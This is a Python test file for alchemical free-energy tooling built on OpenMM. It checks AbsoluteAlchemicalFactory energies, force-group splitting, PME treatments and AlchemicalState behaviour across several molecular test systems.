cls.test_systems['TolueneImplicitGBn'] = testsystems.TolueneImplicitGBn()
# Explicit test system: PME and CutoffPeriodic.
#cls.test_systems['AlanineDipeptideExplicit with CutoffPeriodic'] = \
# testsystems.AlanineDipeptideExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['HostGuestExplicit with PME'] = \
testsystems.HostGuestExplicit(nonbondedMethod=openmm.app.PME)
cls.test_systems['HostGuestExplicit with CutoffPeriodic'] = \
testsystems.HostGuestExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
@classmethod
def define_regions(cls):
"""Create shared AlchemicalRegions for test systems in cls.test_regions."""
cls.test_regions = dict()
cls.test_regions['LennardJonesCluster'] = AlchemicalRegion(alchemical_atoms=range(2))
cls.test_regions['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(10))
cls.test_regions['Toluene'] = AlchemicalRegion(alchemical_atoms=range(6)) # Only partially modified.
cls.test_regions['AlanineDipeptide'] = AlchemicalRegion(alchemical_atoms=range(22))
cls.test_regions['HostGuestExplicit'] = AlchemicalRegion(alchemical_atoms=range(126, 156))
cls.test_regions['TIP3P WaterBox'] = AlchemicalRegion(alchemical_atoms=range(0,3))
# Modify ions.
for atom in cls.test_systems['TIP4P-EW WaterBox and NaCl with PME'].topology.atoms():
if atom.name in ['Na', 'Cl']:
cls.test_regions['TIP4P-EW WaterBox and NaCl'] = AlchemicalRegion(alchemical_atoms=range(atom.index, atom.index+1))
break
@classmethod
def generate_cases(cls):
"""Generate all test cases in cls.test_cases combinatorially."""
cls.test_cases = dict()
direct_space_factory = AbsoluteAlchemicalFactory(alchemical_pme_treatment='direct-space',
alchemical_rf_treatment='switched')
exact_pme_factory = AbsoluteAlchemicalFactory(alchemical_pme_treatment='exact')
# We generate all possible combinations of annihilate_sterics/electrostatics
# for each test system. We also annihilate bonds, angles and torsions every
        # 3 test cases so that they are tested at least once for each test system and for
# each combination of annihilate_sterics/electrostatics.
n_test_cases = 0
for test_system_name, test_system in cls.test_systems.items():
# Find standard alchemical region.
for region_name, region in cls.test_regions.items():
if region_name in test_system_name:
break
assert region_name in test_system_name, test_system_name
# Find nonbonded method.
force_idx, nonbonded_force = forces.find_forces(test_system.system, openmm.NonbondedForce, only_one=True)
nonbonded_method = nonbonded_force.getNonbondedMethod()
# Create all combinations of annihilate_sterics/electrostatics.
for annihilate_sterics, annihilate_electrostatics in itertools.product((True, False), repeat=2):
# Create new region that we can modify.
test_region = region._replace(annihilate_sterics=annihilate_sterics,
annihilate_electrostatics=annihilate_electrostatics)
# Create test name.
test_case_name = test_system_name[:]
if annihilate_sterics:
test_case_name += ', annihilated sterics'
if annihilate_electrostatics:
test_case_name += ', annihilated electrostatics'
# Annihilate bonds and angles every three test_cases.
if n_test_cases % 3 == 0:
test_region = test_region._replace(alchemical_bonds=True, alchemical_angles=True,
alchemical_torsions=True)
test_case_name += ', annihilated bonds, angles and torsions'
# Add different softcore parameters every five test_cases.
if n_test_cases % 5 == 0:
test_region = test_region._replace(softcore_alpha=1.0, softcore_beta=1.0, softcore_a=1.0, softcore_b=1.0,
softcore_c=1.0, softcore_d=1.0, softcore_e=1.0, softcore_f=1.0)
test_case_name += ', modified softcore parameters'
# Pre-generate alchemical system.
alchemical_system = direct_space_factory.create_alchemical_system(test_system.system, test_region)
# Add test case.
cls.test_cases[test_case_name] = (test_system, alchemical_system, test_region)
n_test_cases += 1
                # If we don't use softcore electrostatics and we annihilate charges,
                # we can also test the exact PME treatment. We purposely don't increase
                # n_test_cases so we can keep track of which tests are added above.
if (test_region.softcore_beta == 0.0 and annihilate_electrostatics and
nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald]):
alchemical_system = exact_pme_factory.create_alchemical_system(test_system.system, test_region)
test_case_name += ', exact PME'
cls.test_cases[test_case_name] = (test_system, alchemical_system, test_region)
# If the test system uses reaction field replace reaction field
# of the reference system to allow comparisons.
if nonbonded_method == openmm.NonbondedForce.CutoffPeriodic:
forcefactories.replace_reaction_field(test_system.system, return_copy=False,
switch_width=direct_space_factory.switch_width)
def filter_cases(self, condition_func, max_number=None):
"""Return the list of test cases that satisfy condition_func(test_case_name)."""
if max_number is None:
max_number = len(self.test_cases)
test_cases = {}
for test_name, test_case in self.test_cases.items():
if condition_func(test_name):
test_cases[test_name] = test_case
if len(test_cases) >= max_number:
break
return test_cases
def test_split_force_groups(self):
"""Forces having different lambda variables should have a different force group."""
        # Select 1 implicit, 1 explicit, and 1 exact PME explicit test case.
test_cases = self.filter_cases(lambda x: 'Implicit' in x, max_number=1)
test_cases.update(self.filter_cases(lambda x: 'Explicit ' in x and 'exact PME' in x, max_number=1))
test_cases.update(self.filter_cases(lambda x: 'Explicit ' in x and 'exact PME' not in x, max_number=1))
for test_name, (test_system, alchemical_system, alchemical_region) in test_cases.items():
f = partial(check_split_force_groups, alchemical_system)
f.description = "Testing force splitting among groups of {}".format(test_name)
yield f
def test_fully_interacting_energy(self):
"""Compare the energies of reference and fully interacting alchemical system."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(compare_system_energies, test_system.system,
alchemical_system, alchemical_region, test_system.positions)
f.description = "Testing fully interacting energy of {}".format(test_name)
yield f
def test_noninteracting_energy_components(self):
"""Check all forces annihilated/decoupled when their lambda variables are zero."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(check_noninteracting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Testing non-interacting energy of {}".format(test_name)
yield f
@attr('slow')
def test_fully_interacting_energy_components(self):
"""Test interacting state energy by force component."""
        # This is a very expensive but very informative test. We can
        # run it locally when test_fully_interacting_energy() fails.
test_cases = self.filter_cases(lambda x: 'Explicit' in x)
for test_name, (test_system, alchemical_system, alchemical_region) in test_cases.items():
f = partial(check_interacting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Testing energy components of %s..." % test_name
yield f
@attr('slow')
def test_platforms(self):
"""Test interacting and noninteracting energies on all platforms."""
global GLOBAL_ALCHEMY_PLATFORM
old_global_platform = GLOBAL_ALCHEMY_PLATFORM
# Do not repeat tests on the platform already tested.
if old_global_platform is None:
default_platform_name = utils.get_fastest_platform().getName()
else:
default_platform_name = old_global_platform.getName()
platforms = [platform for platform in utils.get_available_platforms()
if platform.getName() != default_platform_name]
# Test interacting and noninteracting energies on all platforms.
for platform in platforms:
GLOBAL_ALCHEMY_PLATFORM = platform
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(compare_system_energies, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Test fully interacting energy of {} on {}".format(test_name, platform.getName())
yield f
f = partial(check_noninteracting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Test non-interacting energy of {} on {}".format(test_name, platform.getName())
yield f
# Restore global platform
GLOBAL_ALCHEMY_PLATFORM = old_global_platform
@attr('slow')
def test_overlap(self):
"""Tests overlap between reference and alchemical systems."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
#cached_trajectory_filename = os.path.join(os.environ['HOME'], '.cache', 'alchemy', 'tests',
# test_name + '.pickle')
cached_trajectory_filename = None
f = partial(overlap_check, test_system.system, alchemical_system, test_system.positions,
cached_trajectory_filename=cached_trajectory_filename, name=test_name)
f.description = "Testing reference/alchemical overlap for {}".format(test_name)
yield f
class TestMultiRegionAbsoluteAlchemicalFactory(TestAbsoluteAlchemicalFactory):
"""Test AbsoluteAlchemicalFactory class using multiple regions."""
@classmethod
def define_systems(cls):
"""Create shared test systems in cls.test_systems for the test suite."""
cls.test_systems = dict()
# Basic test systems: Lennard-Jones and water particles only.
        # Also test with the dispersion correction and switching function turned off
        # ("on" values for these options are tested in the HostGuestExplicit system).
cls.test_systems['LennardJonesCluster'] = testsystems.LennardJonesCluster()
cls.test_systems['LennardJonesFluid with dispersion correction'] = \
testsystems.LennardJonesFluid(nparticles=100, dispersion_correction=True)
cls.test_systems['TIP3P WaterBox with reaction field, no switch, no dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=False, switch=False, nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['HostGuestExplicit with PME'] = \
testsystems.HostGuestExplicit(nonbondedMethod=openmm.app.PME)
cls.test_systems['HostGuestExplicit with CutoffPeriodic'] = \
testsystems.HostGuestExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
@classmethod
def define_regions(cls):
"""Create shared AlchemicalRegions for test systems in cls.test_regions."""
cls.test_region_zero = dict()
cls.test_region_one = dict()
cls.test_region_two = dict()
cls.test_region_zero['LennardJonesCluster'] = AlchemicalRegion(alchemical_atoms=range(2), name='zero')
cls.test_region_one['LennardJonesCluster'] = AlchemicalRegion(alchemical_atoms=range(2,4), name='one')
cls.test_region_two['LennardJonesCluster'] = AlchemicalRegion(alchemical_atoms=range(4,6), name='two')
cls.test_region_zero['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(10), name='zero')
cls.test_region_one['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(10,20), name='one')
cls.test_region_two['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(20,30), name='two')
cls.test_region_zero['TIP3P WaterBox'] = AlchemicalRegion(alchemical_atoms=range(3), name='zero')
cls.test_region_one['TIP3P WaterBox'] = AlchemicalRegion(alchemical_atoms=range(3,6), name='one')
cls.test_region_two['TIP3P WaterBox'] = AlchemicalRegion(alchemical_atoms=range(6,9), name='two')
        # Three regions would push the HostGuestExplicit system beyond OpenMM's limit of 32 force groups.
cls.test_region_zero['HostGuestExplicit'] = AlchemicalRegion(alchemical_atoms=range(126, 156), name='zero')
cls.test_region_one['HostGuestExplicit'] = AlchemicalRegion(alchemical_atoms=range(156,160), name='one')
cls.test_region_two['HostGuestExplicit'] = None
@classmethod
def generate_cases(cls):
"""Generate all test cases in cls.test_cases combinatorially."""
cls.test_cases = dict()
direct_space_factory = AbsoluteAlchemicalFactory(alchemical_pme_treatment='direct-space',
alchemical_rf_treatment='switched')
exact_pme_factory = AbsoluteAlchemicalFactory(alchemical_pme_treatment='exact')
# We generate all possible combinations of annihilate_sterics/electrostatics
# for each test system. We also annihilate bonds, angles and torsions every
        # 3 test cases so that they are tested at least once for each test system and for
# each combination of annihilate_sterics/electrostatics.
n_test_cases = 0
for test_system_name, test_system in cls.test_systems.items():
# Find standard alchemical region zero.
for region_name_zero, region_zero in cls.test_region_zero.items():
if region_name_zero in test_system_name:
break
assert region_name_zero in test_system_name, test_system_name
# Find standard alchemical region one.
for region_name_one, region_one in cls.test_region_one.items():
if region_name_one in test_system_name:
break
assert region_name_one in test_system_name, test_system_name
# Find standard alchemical region two.
for region_name_two, region_two in cls.test_region_two.items():
if region_name_two in test_system_name:
break
assert region_name_two in test_system_name, test_system_name
            assert region_name_zero == region_name_one == region_name_two
            # We only want two regions for HostGuestExplicit or we would exceed the force group limit.
if 'HostGuestExplicit' in region_name_one:
test_regions = [region_zero, region_one]
else:
test_regions = [region_zero, region_one, region_two]
# Find nonbonded method.
force_idx, nonbonded_force = forces.find_forces(test_system.system, openmm.NonbondedForce, only_one=True)
nonbonded_method = nonbonded_force.getNonbondedMethod()
# Create all combinations of annihilate_sterics/electrostatics.
for annihilate_sterics, annihilate_electrostatics in itertools.product((True, False), repeat=2):
# Create new region that we can modify.
for i, test_region in enumerate(test_regions):
test_regions[i] = test_region._replace(annihilate_sterics=annihilate_sterics,
annihilate_electrostatics=annihilate_electrostatics)
# Create test name.
test_case_name = test_system_name[:]
if annihilate_sterics:
test_case_name += ', annihilated sterics'
if annihilate_electrostatics:
test_case_name += ', annihilated electrostatics'
# Annihilate bonds and angles every three test_cases.
if n_test_cases % 3 == 0:
for i, test_region in enumerate(test_regions):
test_regions[i] = test_region._replace(alchemical_bonds=True, alchemical_angles=True,
alchemical_torsions=True)
test_case_name += ', annihilated bonds, angles and torsions'
# Add different softcore parameters every five test_cases.
if n_test_cases % 5 == 0:
for i, test_region in enumerate(test_regions):
test_regions[i] = test_region._replace(softcore_alpha=1.0, softcore_beta=1.0, softcore_a=1.0, softcore_b=1.0,
softcore_c=1.0, softcore_d=1.0, softcore_e=1.0, softcore_f=1.0)
test_case_name += ', modified softcore parameters'
#region_interactions = frozenset(itertools.combinations(range(len(test_regions)), 2))
# Pre-generate alchemical system.
                alchemical_system = direct_space_factory.create_alchemical_system(test_system.system, alchemical_regions=test_regions)
# Add test case.
cls.test_cases[test_case_name] = (test_system, alchemical_system, test_regions)
n_test_cases += 1
                # If we don't use softcore electrostatics and we annihilate charges,
                # we can also test the exact PME treatment. We purposely don't increase
                # n_test_cases so we can keep track of which tests are added above.
if (test_regions[1].softcore_beta == 0.0 and annihilate_electrostatics and
nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald]):
                    alchemical_system = exact_pme_factory.create_alchemical_system(test_system.system, alchemical_regions=test_regions)
test_case_name += ', exact PME'
cls.test_cases[test_case_name] = (test_system, alchemical_system, test_regions)
# If the test system uses reaction field replace reaction field
# of the reference system to allow comparisons.
if nonbonded_method == openmm.NonbondedForce.CutoffPeriodic:
forcefactories.replace_reaction_field(test_system.system, return_copy=False,
switch_width=direct_space_factory.switch_width)
def test_split_force_groups(self):
"""Forces having different lambda variables should have a different force group."""
        # Select 1 implicit, 1 explicit, and 1 exact PME explicit test case.
test_cases = self.filter_cases(lambda x: 'Implicit' in x, max_number=1)
test_cases.update(self.filter_cases(lambda x: 'Explicit ' in x and 'exact PME' in x, max_number=1))
test_cases.update(self.filter_cases(lambda x: 'Explicit ' in x and 'exact PME' not in x, max_number=1))
for test_name, (test_system, alchemical_system, alchemical_region) in test_cases.items():
region_names = []
for region in alchemical_region:
region_names.append(region.name)
f = partial(check_split_force_groups, alchemical_system, region_names)
f.description = "Testing force splitting among groups of {}".format(test_name)
yield f
def test_noninteracting_energy_components(self):
"""Check all forces annihilated/decoupled when their lambda variables are zero."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(check_multi_noninteracting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Testing non-interacting energy of {}".format(test_name)
yield f
@attr('slow')
def test_platforms(self):
"""Test interacting and noninteracting energies on all platforms."""
global GLOBAL_ALCHEMY_PLATFORM
old_global_platform = GLOBAL_ALCHEMY_PLATFORM
# Do not repeat tests on the platform already tested.
if old_global_platform is None:
default_platform_name = utils.get_fastest_platform().getName()
else:
default_platform_name = old_global_platform.getName()
platforms = [platform for platform in utils.get_available_platforms()
if platform.getName() != default_platform_name]
# Test interacting and noninteracting energies on all platforms.
for platform in platforms:
GLOBAL_ALCHEMY_PLATFORM = platform
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
f = partial(compare_system_energies, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Test fully interacting energy of {} on {}".format(test_name, platform.getName())
yield f
f = partial(check_multi_noninteracting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Test non-interacting energy of {} on {}".format(test_name, platform.getName())
yield f
# Restore global platform
GLOBAL_ALCHEMY_PLATFORM = old_global_platform
@attr('slow')
def test_fully_interacting_energy_components(self):
"""Test interacting state energy by force component."""
        # This is a very expensive but very informative test. We can
        # run it locally when test_fully_interacting_energy() fails.
test_cases = self.filter_cases(lambda x: 'Explicit' in x)
for test_name, (test_system, alchemical_system, alchemical_region) in test_cases.items():
f = partial(check_multi_interacting_energy_components, test_system.system, alchemical_system,
alchemical_region, test_system.positions)
f.description = "Testing energy components of %s..." % test_name
yield f
class TestDispersionlessAlchemicalFactory(object):
"""
Only test overlap for dispersionless alchemical factory, since energy agreement
will be poor.
"""
@classmethod
def setup_class(cls):
"""Create test systems and shared objects."""
cls.define_systems()
cls.define_regions()
cls.generate_cases()
@classmethod
def define_systems(cls):
"""Create test systems and shared objects."""
cls.test_systems = dict()
cls.test_systems['LennardJonesFluid with dispersion correction'] = \
testsystems.LennardJonesFluid(nparticles=100, dispersion_correction=True)
@classmethod
def define_regions(cls):
"""Create shared AlchemicalRegions for test systems in cls.test_regions."""
cls.test_regions = dict()
cls.test_regions['LennardJonesFluid'] = AlchemicalRegion(alchemical_atoms=range(10))
@classmethod
def generate_cases(cls):
"""Generate all test cases in cls.test_cases combinatorially."""
cls.test_cases = dict()
factory = AbsoluteAlchemicalFactory(disable_alchemical_dispersion_correction=True)
# We generate all possible combinations of annihilate_sterics/electrostatics
# for each test system. We also annihilate bonds, angles and torsions every
        # 3 test cases so that they are tested at least once for each test system and for
# each combination of annihilate_sterics/electrostatics.
n_test_cases = 0
for test_system_name, test_system in cls.test_systems.items():
# Find standard alchemical region.
for region_name, region in cls.test_regions.items():
if region_name in test_system_name:
break
assert region_name in test_system_name
# Create all combinations of annihilate_sterics.
            for annihilate_sterics in (True, False):
region = region._replace(annihilate_sterics=annihilate_sterics,
annihilate_electrostatics=True)
# Create test name.
test_case_name = test_system_name[:]
if annihilate_sterics:
test_case_name += ', annihilated sterics'
# Pre-generate alchemical system
alchemical_system = factory.create_alchemical_system(test_system.system, region)
cls.test_cases[test_case_name] = (test_system, alchemical_system, region)
n_test_cases += 1
def test_overlap(self):
"""Tests overlap between reference and alchemical systems."""
for test_name, (test_system, alchemical_system, alchemical_region) in self.test_cases.items():
#cached_trajectory_filename = os.path.join(os.environ['HOME'], '.cache', 'alchemy', 'tests',
# test_name + '.pickle')
cached_trajectory_filename = None
f = partial(overlap_check, test_system.system, alchemical_system, test_system.positions,
cached_trajectory_filename=cached_trajectory_filename, name=test_name)
            f.description = "Testing reference/alchemical overlap for {} with no alchemical dispersion".format(test_name)
yield f
@attr('slow')
class TestAbsoluteAlchemicalFactorySlow(TestAbsoluteAlchemicalFactory):
"""Test AbsoluteAlchemicalFactory class with a more comprehensive set of systems."""
@classmethod
def define_systems(cls):
"""Create test systems and shared objects."""
cls.test_systems = dict()
cls.test_systems['LennardJonesFluid without dispersion correction'] = \
testsystems.LennardJonesFluid(nparticles=100, dispersion_correction=False)
cls.test_systems['DischargedWaterBox with reaction field, no switch, no dispersion correction'] = \
testsystems.DischargedWaterBox(dispersion_correction=False, switch=False,
nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['WaterBox with reaction field, no switch, dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=False, switch=True, nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['WaterBox with reaction field, switch, no dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=False, switch=True, nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['WaterBox with PME, switch, dispersion correction'] = \
testsystems.WaterBox(dispersion_correction=True, switch=True, nonbondedMethod=openmm.app.PME)
# Big systems.
cls.test_systems['LysozymeImplicit'] = testsystems.LysozymeImplicit()
cls.test_systems['DHFRExplicit with reaction field'] = \
testsystems.DHFRExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['SrcExplicit with PME'] = \
testsystems.SrcExplicit(nonbondedMethod=openmm.app.PME)
cls.test_systems['SrcExplicit with reaction field'] = \
testsystems.SrcExplicit(nonbondedMethod=openmm.app.CutoffPeriodic)
cls.test_systems['SrcImplicit'] = testsystems.SrcImplicit()
@classmethod
def define_regions(cls):
super(TestAbsoluteAlchemicalFactorySlow, cls).define_regions()
cls.test_regions['WaterBox'] = AlchemicalRegion(alchemical_atoms=range(3))
cls.test_regions['LysozymeImplicit'] = AlchemicalRegion(alchemical_atoms=range(2603, 2621))
cls.test_regions['DHFRExplicit'] = AlchemicalRegion(alchemical_atoms=range(0, 2849))
cls.test_regions['Src'] = AlchemicalRegion(alchemical_atoms=range(0, 21))
# =============================================================================
# TEST ALCHEMICAL STATE
# =============================================================================
class TestAlchemicalState(object):
"""Test AlchemicalState compatibility with CompoundThermodynamicState."""
@classmethod
def setup_class(cls):
"""Create test systems and shared objects."""
alanine_vacuum = testsystems.AlanineDipeptideVacuum()
alanine_explicit = testsystems.AlanineDipeptideExplicit()
factory = AbsoluteAlchemicalFactory()
factory_exact_pme = AbsoluteAlchemicalFactory(alchemical_pme_treatment='exact')
cls.alanine_alchemical_atoms = list(range(22))
cls.alanine_test_system = alanine_explicit
# System with only lambda_sterics and lambda_electrostatics.
alchemical_region = AlchemicalRegion(alchemical_atoms=cls.alanine_alchemical_atoms)
alchemical_alanine_system = factory.create_alchemical_system(alanine_vacuum.system, alchemical_region)
cls.alanine_state = states.ThermodynamicState(alchemical_alanine_system,
temperature=300*unit.kelvin)
# System with lambda_sterics and lambda_electrostatics and exact PME treatment.
alchemical_alanine_system_exact_pme = factory_exact_pme.create_alchemical_system(alanine_explicit.system,
alchemical_region)
cls.alanine_state_exact_pme = states.ThermodynamicState(alchemical_alanine_system_exact_pme,
temperature=300*unit.kelvin,
pressure=1.0*unit.atmosphere)
# System with all lambdas.
alchemical_region = AlchemicalRegion(alchemical_atoms=cls.alanine_alchemical_atoms,
alchemical_torsions=True, alchemical_angles=True,
alchemical_bonds=True)
fully_alchemical_alanine_system = factory.create_alchemical_system(alanine_vacuum.system, alchemical_region)
cls.full_alanine_state = states.ThermodynamicState(fully_alchemical_alanine_system,
temperature=300*unit.kelvin)
# Test case: (ThermodynamicState, defined_lambda_parameters)
cls.test_cases = [
(cls.alanine_state, {'lambda_sterics', 'lambda_electrostatics'}),
(cls.alanine_state_exact_pme, {'lambda_sterics', 'lambda_electrostatics'}),
(cls.full_alanine_state, {'lambda_sterics', 'lambda_electrostatics', 'lambda_bonds',
'lambda_angles', 'lambda_torsions'})
]
@staticmethod
    def test_constructor():
        """Test that the AlchemicalState constructor behaves as expected."""
# Raise an exception if parameter is not recognized.
with nose.tools.assert_raises(AlchemicalStateError):
AlchemicalState(lambda_electro=1.0)
# Properties are initialized correctly.
test_cases = [{},
{'lambda_sterics': 0.5, 'lambda_angles': 0.5},
{'lambda_electrostatics': 1.0}]
for test_kwargs in test_cases:
alchemical_state = AlchemicalState(**test_kwargs)
for parameter in AlchemicalState._get_controlled_parameters():
if parameter in test_kwargs:
assert getattr(alchemical_state, parameter) == test_kwargs[parameter]
else:
assert getattr(alchemical_state, parameter) is None
def test_from_system_constructor(self):
"""Test AlchemicalState.from_system constructor."""
# A non-alchemical system raises an error.
with nose.tools.assert_raises(AlchemicalStateError):
AlchemicalState.from_system(testsystems.AlanineDipeptideVacuum().system)
# Valid parameters are 1.0 by default in AbsoluteAlchemicalFactory,
# and all the others must be None.
for state, defined_lambdas in self.test_cases:
alchemical_state = AlchemicalState.from_system(state.system)
for parameter in AlchemicalState._get_controlled_parameters():
property_value = getattr(alchemical_state, parameter)
if parameter in defined_lambdas:
assert property_value == 1.0, '{}: {}'.format(parameter, property_value)
else:
assert property_value is None, '{}: {}'.format(parameter, property_value)
@staticmethod
def test_equality_operator():
"""Test equality operator between AlchemicalStates."""
state1 = AlchemicalState(lambda_electrostatics=1.0)
state2 = AlchemicalState(lambda_electrostatics=1.0)
state3 = AlchemicalState(lambda_electrostatics=0.9)
state4 = AlchemicalState(lambda_electrostatics=0.9, lambda_sterics=1.0)
assert state1 == state2
assert state2 != state3
assert state3 != state4
def test_apply_to_system(self):
"""Test method AlchemicalState.apply_to_system()."""
# Do not modify cached test cases.
test_cases = copy.deepcopy(self.test_cases)
# Test precondition: all parameters are 1.0.
for state, defined_lambdas in test_cases:
kwargs = dict.fromkeys(defined_lambdas, 1.0)
alchemical_state = AlchemicalState(**kwargs)
assert alchemical_state == AlchemicalState.from_system(state.system)
# apply_to_system() modifies the state.
for state, defined_lambdas in test_cases:
kwargs = dict.fromkeys(defined_lambdas, 0.5)
alchemical_state = AlchemicalState(**kwargs)
system = state.system
alchemical_state.apply_to_system(system)
system_state = AlchemicalState.from_system(system)
assert system_state == alchemical_state
# Raise an error if an extra parameter is defined in the system.
for state, defined_lambdas in test_cases:
defined_lambdas = set(defined_lambdas) # Copy
defined_lambdas.pop() # Remove one element.
kwargs = dict.fromkeys(defined_lambdas, 1.0)
alchemical_state = AlchemicalState(**kwargs)
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.apply_to_system(state.system)
# Raise an error if an extra parameter is defined in the state.
for state, defined_lambdas in test_cases:
if 'lambda_bonds' in defined_lambdas:
continue
defined_lambdas = set(defined_lambdas) # Copy
defined_lambdas.add('lambda_bonds') # Add extra parameter.
kwargs = dict.fromkeys(defined_lambdas, 1.0)
alchemical_state = AlchemicalState(**kwargs)
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.apply_to_system(state.system)
def test_check_system_consistency(self):
"""Test method AlchemicalState.check_system_consistency()."""
# A system is consistent with itself.
alchemical_state = AlchemicalState.from_system(self.alanine_state.system)
alchemical_state.check_system_consistency(self.alanine_state.system)
# Raise error if system has MORE lambda parameters.
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.check_system_consistency(self.full_alanine_state.system)
# Raise error if system has LESS lambda parameters.
alchemical_state = AlchemicalState.from_system(self.full_alanine_state.system)
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.check_system_consistency(self.alanine_state.system)
# Raise error if system has different lambda values.
alchemical_state.lambda_bonds = 0.5
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.check_system_consistency(self.full_alanine_state.system)
def test_apply_to_context(self):
"""Test method AlchemicalState.apply_to_context."""
integrator = openmm.VerletIntegrator(1.0*unit.femtosecond)
# Raise error if Context has more parameters than AlchemicalState.
alchemical_state = AlchemicalState.from_system(self.alanine_state.system)
context = self.full_alanine_state.create_context(copy.deepcopy(integrator))
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.apply_to_context(context)
del context
# Raise error if AlchemicalState is applied to a Context with missing parameters.
alchemical_state = AlchemicalState.from_system(self.full_alanine_state.system)
context = self.alanine_state.create_context(copy.deepcopy(integrator))
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.apply_to_context(context)
del context
# Correctly sets Context's parameters.
for state in [self.full_alanine_state, self.alanine_state_exact_pme]:
alchemical_state = AlchemicalState.from_system(state.system)
context = state.create_context(copy.deepcopy(integrator))
alchemical_state.set_alchemical_parameters(0.5)
alchemical_state.apply_to_context(context)
for parameter_name, parameter_value in context.getParameters().items():
if parameter_name in alchemical_state._parameters:
assert parameter_value == 0.5
del context
def test_standardize_system(self):
"""Test method AlchemicalState.standardize_system."""
test_cases = [self.full_alanine_state, self.alanine_state_exact_pme]
for state in test_cases:
# First create a non-standard system.
system = copy.deepcopy(state.system)
alchemical_state = AlchemicalState.from_system(system)
alchemical_state.set_alchemical_parameters(0.5)
alchemical_state.apply_to_system(system)
# Test pre-condition: The state of the System has been changed.
assert AlchemicalState.from_system(system).lambda_electrostatics == 0.5
# Check that _standardize_system() sets all parameters back to 1.0.
alchemical_state._standardize_system(system)
standard_alchemical_state = AlchemicalState.from_system(system)
assert alchemical_state != standard_alchemical_state
for parameter_name, value in alchemical_state._parameters.items():
standard_value = getattr(standard_alchemical_state, parameter_name)
assert (value is None and standard_value is None) or (standard_value == 1.0)
def test_find_force_groups_to_update(self):
"""Test method AlchemicalState._find_force_groups_to_update."""
test_cases = [self.full_alanine_state, self.alanine_state_exact_pme]
for thermodynamic_state in test_cases:
system = copy.deepcopy(thermodynamic_state.system)
alchemical_state = AlchemicalState.from_system(system)
alchemical_state2 = copy.deepcopy(alchemical_state)
            # Each lambda should be separated into its own force group.
expected_force_groups = {}
for force, lambda_name, _ in AlchemicalState._get_system_controlled_parameters(
system, parameters_name_suffix=None):
expected_force_groups[lambda_name] = force.getForceGroup()
integrator = openmm.VerletIntegrator(2.0*unit.femtoseconds)
context = create_context(system, integrator)
# No force group should be updated if we don't move.
assert alchemical_state._find_force_groups_to_update(context, alchemical_state2, memo={}) == set()
# Change the lambdas one by one and check that the method
            # recognizes that the force group energy must be updated.
for lambda_name in AlchemicalState._get_controlled_parameters():
# Check that the system defines the global variable.
if getattr(alchemical_state, lambda_name) is None:
continue
# Change the current state.
setattr(alchemical_state2, lambda_name, 0.0)
force_group = expected_force_groups[lambda_name]
assert alchemical_state._find_force_groups_to_update(context, alchemical_state2, memo={}) == {force_group}
setattr(alchemical_state2, lambda_name, 1.0) # Reset current state.
del context
def test_alchemical_functions(self):
"""Test alchemical variables and functions work correctly."""
system = copy.deepcopy(self.full_alanine_state.system)
alchemical_state = AlchemicalState.from_system(system)
# Add two alchemical variables to the state.
alchemical_state.set_function_variable('lambda', 1.0)
alchemical_state.set_function_variable('lambda2', 0.5)
assert alchemical_state.get_function_variable('lambda') == 1.0
assert alchemical_state.get_function_variable('lambda2') == 0.5
        # A controlled lambda parameter name cannot be used as a function variable.
with nose.tools.assert_raises(AlchemicalStateError):
alchemical_state.set_function_variable('lambda_sterics', 0.5)
# Assign string alchemical functions to parameters.
alchemical_state.lambda_sterics = AlchemicalFunction('lambda')
alchemical_state.lambda_electrostatics = AlchemicalFunction('(lambda + lambda2) / 2.0')
assert alchemical_state.lambda_sterics == 1.0
assert alchemical_state.lambda_electrostatics == 0.75
        # Setting alchemical variables updates the dependent alchemical parameters as well.
alchemical_state.set_function_variable('lambda2', 0)
assert alchemical_state.lambda_electrostatics == 0.5
# ---------------------------------------------------
# Integration tests with CompoundThermodynamicStates
# ---------------------------------------------------
def test_constructor_compound_state(self):
"""The AlchemicalState is set on construction of the CompoundState."""
test_cases = copy.deepcopy(self.test_cases)
# Test precondition: the original systems are in fully interacting state.
for state, defined_lambdas in test_cases:
system_state = AlchemicalState.from_system(state.system)
kwargs = dict.fromkeys(defined_lambdas, 1.0)
assert system_state == AlchemicalState(**kwargs)
        # CompoundThermodynamicState sets the system state in its constructor.
